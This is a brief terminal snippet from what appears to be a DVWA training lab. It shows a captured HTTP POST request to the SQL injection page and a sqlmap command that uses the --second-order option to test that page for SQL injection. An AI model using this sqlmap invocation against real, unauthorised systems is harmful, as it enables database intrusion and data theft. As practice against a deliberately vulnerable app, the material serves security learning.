cat sqli.txt
POST /dvwa/vulnerabilities/sqli/session-input.php HTTP/1.1
Host: 172.19.180.27
Proxy-Connection: keep-alive
Content-Length: 19
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0
.8
Origin: http://172.19.180.27
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/49.0.2623.112 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://172.19.180.27/dvwa/vulnerabilities/sqli/session-input.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: security=high; PHPSESSID=amh7ni5q8215gfj2dkgbt0b1j0
id=a&Submit=Submit
./sqlmap.py -r sqli.txt --second-order "http://172.19.180.27/dvwa/vulnerabilities/sqli/" --string "Surname"